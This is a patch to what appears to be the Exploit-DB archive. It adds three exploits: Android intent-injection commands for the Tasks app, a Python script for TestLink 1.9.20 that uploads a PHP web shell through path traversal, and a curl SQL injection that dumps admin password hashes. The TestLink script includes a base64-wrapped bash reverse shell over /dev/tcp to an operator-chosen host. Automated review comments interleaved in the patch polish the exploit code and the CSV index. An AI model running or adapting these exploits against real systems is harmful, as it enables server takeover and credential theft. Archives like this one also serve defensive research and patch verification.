From bedbb144ab42330d1272a6481c3c2258548dd5c1 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 16 Feb 2021 05:01:53 +0000 Subject: [PATCH] DB: 2021-02-16 3 changes to exploits/shellcodes Tasks 9.7.3 - Insecure Permissions TestLink 1.9.20 - Unrestricted File Upload (Authenticated) Teachers Record Management System 1.0 - 'searchteacher' SQL Injection --- exploits/android/local/49563.txt | 20 ++++ exploits/php/webapps/49561.py | 200 +++++++++++++++++++++++++++++++ exploits/php/webapps/49562.sh | 31 +++++ files_exploits.csv | 3 + 4 files changed, 254 insertions(+) create mode 100644 exploits/android/local/49563.txt create mode 100755 exploits/php/webapps/49561.py create mode 100755 exploits/php/webapps/49562.sh diff --git a/exploits/android/local/49563.txt b/exploits/android/local/49563.txt new file mode 100644 index 000000000..1745e9545 --- /dev/null +++ b/exploits/android/local/49563.txt 
@@ -0,0 +1,20 @@
+# Exploit Title: Tasks 9.7.3 - Insecure Permissions
+# Date: 18th of July, 2020
+# Exploit Author: Lyhin's Lab
+# Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/
+# Vendor Homepage: https://tasks.org/
+# Software Link: https://github.com/tasks/tasks
+# Version: 9.7.3
+# Tested on: Android 9
+
+Any installed application on a victim's phone can add arbitrary tasks to users through insecure IPC handling.
+A malicious application has several ways of how to achieve that:
+
+1. By sending multiple intents to ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). Tasks application adds the first requested "task" to the user's task list.
+
+2. By sending an intent to VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate intent's origin, so any application can append tasks to the user's task list.
+
+We used the Drozer application to emulate malicious app activity. Please find the commands below.
+
+run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT "Kill Mufasa"
+run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT "Visit https://lyhinslab.org"
\ No newline at end of file
diff --git a/exploits/php/webapps/49561.py b/exploits/php/webapps/49561.py
new file mode 100755
index 000000000..fc8932227
--- /dev/null
+++ b/exploits/php/webapps/49561.py
@@ -0,0 +1,200 @@
+# Exploit Title: TestLink 1.9.20 - Unrestricted File Upload (Authenticated)
+# Date: 14th February 2021
+# Exploit Author: snovvcrash
+# Original Research by: Ackcent AppSec Team
+# Original Research: https://ackcent.com/testlink-1-9-20-unrestricted-file-upload-and-sql-injection/
+# Vendor Homepage: https://testlink.org/
+# Software Link: https://github.com/TestLinkOpenSourceTRMS/testlink-code
+# Version: 1.9.20
+# Tested on: Ubuntu 20.10
+# CVE: CVE-2020-8639
+# Requirements: pip3 install -U requests bs4
+# Usage Example: ./exploit.py -u admin -p admin -P 127.0.0.1:8080 http://127.0.0.1/testlink
+
+"""
+Raw exploit request:
+
+POST /testlink/lib/keywords/keywordsImport.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------242818621515179709592867995067
+Content-Length: 1187
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/testlink//lib/keywords/keywordsImport.php?tproject_id=1
+Cookie: PHPSESSID=kvbpl3t3lec42qbjdcgdppncib; TESTLINK1920TESTLINK_USER_AUTH_COOKIE=af57ebce9f54ce0f0e36d24ef25dc9c1b3a9d2f8e0b9cb4454c973927306e90f
+Upgrade-Insecure-Requests: 1
+
+-----------------------------242818621515179709592867995067
+Content-Disposition: form-data; name="CSRFName"
+
+CSRFGuard_1115715115
+-----------------------------242818621515179709592867995067
+Content-Disposition: form-data; name="CSRFToken"
+
+506c4b44825c5e5885231c263e7195188dedbd154b9cf74e5d183c1feb953aec7c0edae1097649d82acd20f6f851e0cdbac91cc0589d1cfd6fb13741f9cf0cb8
+-----------------------------242818621515179709592867995067
+Content-Disposition: form-data; name="importType"
+
+/../../../logs/pwn.php
+-----------------------------242818621515179709592867995067
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+409600
+-----------------------------242818621515179709592867995067
+Content-Disposition: form-data; name="uploadedFile"; filename="foo.xml"
+Content-Type: application/xml
+
+&1' );} ?>
+-----------------------------242818621515179709592867995067
+Content-Disposition: form-data; name="tproject_id"
+
+1
+-----------------------------242818621515179709592867995067
+Content-Disposition: form-data; name="UploadFile"
+
+Upload file
+-----------------------------242818621515179709592867995067--
+"""
+
+#!/usr/bin/env python3
+
+import re
+from urllib import parse
+from cmd import Cmd
+from base64 import b64encode
+from argparse import ArgumentParser
+
+import requests
+from bs4 import BeautifulSoup
+
+parser = ArgumentParser()
+parser.add_argument('target', help='target full URL without trailing slash, ex. "http://127.0.0.1/testlink"')
+parser.add_argument('-u', '--username', default='admin', help='TestLink username')
+parser.add_argument('-p', '--password', default='admin', help='TestLink password')
+parser.add_argument('-P', '--proxy', default=None, help='HTTP proxy in format , ex. "127.0.0.1:8080"')
+args = parser.parse_args()
+
+
+class TestLinkWebShell(Cmd):
+
+ payloadPHP = """&1' );} ?>"""
+ uploadPath = 'logs/pwn.php'
+ prompt = '$ '
+
+ def __init__(self, target, username, password, proxies):
+ super().__init__()
+
+ self.target = target
+ self.username = username
+ self.password = password
+
+ if proxies:
+ self.proxies = {'http': f'http://{proxies}', 'https': f'http://{proxies}'}
+ else:
+ self.proxies = None
+
+ self.session = requests.Session()
+ self.session.verify = False
+
+ resp = self.session.get(f'{self.target}/login.php', proxies=self.proxies)
+ soup = BeautifulSoup(resp.text, 'html.parser')
+
+ self.csrf_name = soup.find('input', {'name': 'CSRFName'}).get('value')
+ self.csrf_token = soup.find('input', {'name': 'CSRFToken'}).get('value')
+ self.req_uri = soup.find('input', {'name': 'reqURI'}).get('value')
+ self.destination = soup.find('input', {'name': 'destination'}).get('value')
+
+ def auth(self):
+ data = {
+ 'CSRFName': self.csrf_name,
+ 'CSRFToken': self.csrf_token,
+ 'reqURI': self.req_uri,
+ 'destination': self.destination,
+ 'tl_login': self.username,
+ 'tl_password': self.password
+ }
+
+ resp = self.session.post(f'{self.target}/login.php?viewer=', data=data, proxies=self.proxies)
+ if resp.status_code == 200:
+ print('[*] Authentication succeeded')
+
+ resp = self.session.get(f'{self.target}/lib/general/mainPage.php', proxies=self.proxies)
+ if resp.status_code == 200:
+ print('[*] Loaded mainPage.php iframe contents')
+ soup = BeautifulSoup(resp.text, 'html.parser')
+
+ self.tproject_id = soup.find('a', {'href': re.compile(r'lib/keywords/keywordsView.php\?')}).get('href')
+ self.tproject_id = parse.parse_qs(parse.urlsplit(self.tproject_id).query)['tproject_id'][0]
+
+ print(f'[+] Extracted tproject_id value: {self.tproject_id}')
+
+ else:
+ raise Exception('Error loading mainPage.php iframe contents')
+
+ else:
+ raise Exception('Authentication failed')
+
+ def upload_web_shell(self):
+ files = [
+ ('CSRFName', (None, self.csrf_name)),
+ ('CSRFToken', (None, self.csrf_token)),
+ ('importType', (None, f'/../../../{TestLinkWebShell.uploadPath}')),
+ ('MAX_FILE_SIZE', (None, '409600')),
+ ('uploadedFile', ('foo.xml', TestLinkWebShell.payloadPHP)),
+ ('tproject_id', (None, self.tproject_id)),
+ ('UploadFile', (None, 'Upload file'))
+ ]
+
+ resp = self.session.post(f'{self.target}/lib/keywords/keywordsImport.php', files=files, proxies=self.proxies)
+ if resp.status_code == 200:
+ print(f'[*] Web shell uploaded here: {self.target}/{TestLinkWebShell.uploadPath}')
+
+ print('[*] Trying to query whoami...')
+ resp = self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}?c=whoami', proxies=self.proxies)
+ if resp.status_code == 200:
+ print(f'[+] Success! Starting semi-interactive shell as {resp.text.strip()}')
+
+ else:
+ raise Exception('Error interacting with the web shell')
+
+ else:
+ raise Exception('Error uploading web shell')
+
+ def emptyline(self):
+ pass
+
+ def preloop(self):
+ self.auth()
+ self.upload_web_shell()
+
+ def default(self, args):
+ try:
+ resp = self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}?c={args}', proxies=self.proxies)
+ if resp.status_code == 200:
+ print(resp.text.strip())
+ except Exception as e:
+ print(f'*** Something weired happened: {e}')
+
+ def do_spawn(self, args):
+ """Spawn a reverse shell. Usage: \"spawn \"."""
+ try:
+ lhost, lport = args.split()
+ payload = f'/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'
+ b64_payload = b64encode(payload.encode()).decode()
+ cmd = f'echo {b64_payload} | base64 -d | /bin/bash'
+ self.default(cmd)
+ except Exception as e:
+ print(f'*** Something weired happened: {e}')
+
+ def do_EOF(self, args):
+ """Use Ctrl-D to exit the shell."""
+ print(); return True
+
+
+if __name__ == '__main__':
+ tlws = TestLinkWebShell(args.target, args.username, args.password, args.proxy)
+ tlws.cmdloop('Type help for list of commands')
\ No newline at end of file
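Review bot: The `#!/usr/bin/env python3` line is placed after the header comments and the module docstring (new-file line 63), so the kernel never sees it and the documented `./exploit.py …` invocation of this mode-100755 file will not be run as Python; it has to be the first line of the file. `self.session.verify = False` in `__init__` disables certificate verification for every target unconditionally, which leaves the operator's own session open to interception and emits InsecureRequestWarning on each request; gate it on the `-P` proxy option or a dedicated flag instead of hard-coding it. `auth()` prints `[*] Authentication succeeded` on any HTTP 200, but a login form that re-renders on bad credentials would presumably also return 200, so the check should look for a post-login marker in `resp.text` rather than the status code (the later `soup.find(...)` returning `None` would then raise an opaque AttributeError rather than `Authentication failed`). `default()` and `do_spawn()` catch bare `Exception` and print `Something weired happened`; narrowing to `requests.RequestException` / `ValueError` and fixing the typo to `weird` would make failures diagnosable.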
diff --git a/exploits/php/webapps/49562.sh b/exploits/php/webapps/49562.sh
new file mode 100755
index 000000000..1f0d89b45
--- /dev/null
+++ b/exploits/php/webapps/49562.sh
@@ -0,0 +1,31 @@
+# Exploit Title: Teachers Record Management System 1.0 - 'searchteacher' SQL Injection
+# Date: 13/02/2021
+# Exploit Author: Soham Bakore, Nakul Ratti
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14399/teacher-record-system-phpmysql.html
+# Version:1.0
+# Tested on: latest version of Chrome, Firefox on Windows and Linux
+
+--------------------------Proof of Concept-----------------------
+
+1. Navigate to http://host/trms/
+2. The "searchteacher" parameter in search-teacher.php is vulnerable to SQL
+injection
+3. Below curl request will display the admin username and password hash
+
+------------------------Exploit request-----------------------------
+
+curl -i -s -k -X $'POST' \
+ -H $'Host: 192.168.1.13' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0;
+Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0' -H $'Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
+-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate'
+-H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length:
+130' -H $'Origin: http://192.168.1.17' -H $'DNT: 1' -H $'Connection: close'
+-H $'Referer: http://192.168.1.13/trms/' -H $'Cookie:
+PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' -H $'Upgrade-Insecure-Requests: 1' \
+ -b $'PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' \
+ --data-binary
+$'searchteacher=Arts\'+union+select+1,concat(\'Username:\',UserName),3,concat(\'Password:\',Password),5,6,7,8,9,10+from+tbladmin#&search='
+\
+ $'http://host/trms/search-teacher.php'
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8a358c782..a82540083 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
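Review bot: The file is committed as `49562.sh` with mode 100755, but its body is prose plus an e-mail-wrapped curl command: the lines beginning `Win64; x64;`, `text/html,`, `-H $'Accept-Language`, `130'`, `-H $'Referer` and `$'searchteacher=` each follow a line that has no trailing `\`, so a shell would not read them as part of the same command, and the prose lines above would be executed as commands themselves. As committed this is a text proof of concept rather than a runnable script, and a `.txt` name (as used for 49563 in the same commit) would describe it more accurately than the executable bit. The request is also internally inconsistent — `Host: 192.168.1.13` and `Referer: http://192.168.1.13/trms/` name one address, `Origin: http://192.168.1.17` another, and the URL argument uses the placeholder `http://host/trms/` — so the write-up would read better with one value used throughout. On the application side the defect being demonstrated is the unparameterised `searchteacher` value in search-teacher.php; a prepared statement is the fix.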
@@ -11262,6 +11262,7 @@ id,file,description,date,author,type,platform,port
 49541,exploits/windows/local/49541.html,"Microsoft Internet Explorer 11 32-bit - Use-After-Free",2021-02-08,"Forrest Orr",local,windows,
 49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path",2021-02-09,"Hector Gerbacio",local,windows,
 49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows,
+49563,exploits/android/local/49563.txt,"Tasks 9.7.3 - Insecure Permissions",2021-02-15,"Lyhin\'s Lab",local,android,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
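Review bot: The added 49563 row writes the author field as `"Lyhin\'s Lab"`, but CSV has no backslash escaping and the neighbouring rows put apostrophes inside double-quoted fields unescaped (`'EMP_UDSA'`, `'ATService'`, `'ntdll.dll'`), so any consumer of files_exploits.csv will get the literal string `Lyhin\'s Lab` as the author. Change the field to `"Lyhin's Lab"`, which also matches the `# Exploit Author: Lyhin's Lab` header of exploits/android/local/49563.txt in this commit.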
@@ -43531,6 +43532,7 @@ id,file,description,date,author,type,platform,port
 49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
 49559,exploits/php/webapps/49559.txt,"School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting",2021-02-12,"Pintu Solanki",webapps,php,
 49560,exploits/php/webapps/49560.txt,"School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting",2021-02-12,"Suresh Kumar",webapps,php,
+49561,exploits/php/webapps/49561.py,"TestLink 1.9.20 - Unrestricted File Upload (Authenticated)",2021-02-15,snovvcrash,webapps,php,
 49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
 49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
 49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
@@ -43749,3 +43751,4 @@ id,file,description,date,author,type,platform,port
 49555,exploits/php/webapps/49555.txt,"b2evolution 6.11.6 - 'tab3' Reflected XSS",2021-02-11,"Nakul Ratti",webapps,php,
 49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple,
 49557,exploits/php/webapps/49557.py,"Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)",2021-02-11,"Ricardo Ruiz",webapps,php,
+49562,exploits/php/webapps/49562.sh,"Teachers Record Management System 1.0 - 'searchteacher' SQL Injection",2021-02-15,"Soham Bakore",webapps,php,
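Review bot: The added 49562 row in the second hunk credits `"Soham Bakore"` alone, while the header of exploits/php/webapps/49562.sh in this same commit reads `# Exploit Author: Soham Bakore, Nakul Ratti`; if the index is meant to mirror the file headers (the 49561 row in the first hunk does match its file's `snovvcrash`), the author field should be `"Soham Bakore, Nakul Ratti"`. If listing only the first author is deliberate policy for the index, a short note in the file header stating that convention would stop this from reading as an omission.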